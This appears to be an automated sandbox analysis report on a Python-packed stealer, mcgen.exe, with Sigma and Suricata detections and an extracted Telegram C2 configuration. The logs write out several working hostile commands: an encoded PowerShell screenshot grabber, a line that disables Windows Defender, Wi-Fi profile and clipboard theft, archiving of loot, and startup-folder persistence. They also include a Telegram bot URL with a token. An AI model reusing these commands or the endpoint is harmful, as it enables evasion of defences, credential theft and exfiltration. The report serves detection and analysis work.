AB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 2912, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\mcgen.exe, ProcessId: 7020, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\mcgen.exe, ProcessId: 7020, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\mcgen.exe, ProcessId: 7020, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7524, TargetFilename: C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7060, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *, ProcessId: 2300, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3196, ParentProcessName: cmd.exe, ProcessCommandLine: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend, ProcessId: 4072, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBo

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\mcgen.exe", ParentImage: C:\Users\user\Desktop\mcgen.exe, ParentProcessId: 7020, ParentProcessName: mcgen.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 3660, ProcessName: cmd.exe

Suricata Signatures

ETPRO MALWARE SynthIndi Loader CnC Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:22:41.094206+0100	2857752	1	A Network Trojan was detected	149.154.167.220	443	192.168.2.6	49894	TCP

ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:22:39.750661+0100	2857751	1	A Network Trojan was detected	192.168.2.6	49894	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T09:22:39.750486+0100	1810008	1	Potentially Bad Traffic	192.168.2.6	49894	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: mcgen.exe.7020.2.memstrmin

Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendMessage"}

Multi AV Scanner detection for submitted file

Source: mcgen.exe	Virustotal: Detection: 44%			Perma Link
Source: mcgen.exe	ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe

Code function: 103_2_00007FF695CE901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

103_2_00007FF695CE901C

Source: mcgen.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mcgen.exe, 00000002.00000002.2533004812.00007FFD93B77000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: mcgen.exe, 00000002.00000002.2533576482.00007FFD93FDA000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbDD source: mcgen.exe, 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.pdbhP source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F123000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2539430082.00007FFDAC064000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: mcgen.exe, 00000002.00000002.2533576482.00007FFD93F42000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2539430082.00007FFDAC064000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2533576482.00007FFD93FDA000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.pdb source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F123000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000067.00000000.2410225338.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: mcgen.exe, 00000002.00000002.2538780635.00007FFDA5491000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mcgen.exe, 00000002.00000002.2537613494.00007FFDA34F1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mcgen.exe, 00000002.00000002.2537894188.00007FFDA3A81000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: mcgen.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mcgen.exe, 00000002.00000002.2537371109.00007FFDA349B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: mcgen.exe, 00000002.00000002.2538594297.00007FFDA4DA1000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mcgen.exe, 00000002.00000002.2537371109.00007FFDA349B000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mcgen.exe, 00000002.00000002.2538398509.00007FFDA4161000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mcgen.exe, 00000002.00000002.2538121541.00007FFDA3AE1000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: mcgen.exe, 00000002.00000002.2537138652.00007FFDA3451000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mcgen.exe, 00000002.00000002.2536860815.00007FFDA3411000.00000040.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6B9F183B0
